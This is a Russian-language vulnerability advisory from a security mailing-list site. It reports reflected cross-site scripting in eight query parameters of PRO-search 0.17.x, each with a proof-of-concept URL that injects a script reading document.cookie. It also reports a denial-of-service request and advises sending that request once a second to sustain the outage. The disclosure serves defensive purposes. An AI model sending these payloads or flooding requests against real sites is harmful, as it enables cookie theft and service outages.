Информационная безопасность
[RU] switch to
English Version

  

Дополнительная информация

  Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl )

  SimpleForum <= 4.6.2 - Cross-Site Scripting Vulnerability

  Multiple vulnerabilities in RUNCMS 1.6   by DSecRG

From:MustLive <mustlive_(at)_websecurity.com.ua>
Date:26 декабря 2007 г.
Subject:Vulnerabilities in PRO-search

Здравствуйте 3APA3A!

Сообщаю вам о найденной мною Cross-Site Scripting и Denial of Service уязвимостях в PRO-search.

XSS:

Уязвимости на главной странице в параметрах prot, host, path, name, ext, size, search_days, show_page.

http://site/?prot=%22%3E%3Cscript%3Ealert(document.
cookie)%3C/script%3E

http://site/?host=%22%3E%3Cscript%3Ealert(document.
cookie)%3C/script%3E

http://site/?path=%22%3E%3Cscript%3Ealert(document.
cookie)%3C/script%3E

http://site/?name=%22%3E%3Cscript%3Ealert(document.
cookie)%3C/script%3E

http://site/?ext=%22%3E%3Cscript%3Ealert(document.
cookie)%3C/script%3E

http://site/?size=%22%3E%3Cscript%3Ealert(document.
cookie)%3C/script%3E

http://site/?search_days=%22%3E%3Cscript%3Ealert(document.
cookie)%3C/script%3E

http://site/?show_page=%27%3E%3Cscript%3Ealert(document.
cookie)%3C/script%3E

Denial of Service:

http://site/?show_page=20000&time=0

Поисковик ищет по всем файлам, что может привести к DoS (чем больше значение show_page, тем большая задержка сервера). DoS кратковременный, поэтому для проведения DoS атаки нужно регулярно (ежесекундно) посылать запрос к серверу.

Дополнительная информация о данных уязвимостях у меня на сайте:
http://websecurity.com.ua/1259/

Уязвимы версии PRO-search 0.17.x и все предыдущие версии.

Best wishes & regards,
MustLive
Администратор сайта
http://websecurity.com.ua

О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород

 
 



Rating@Mail.ru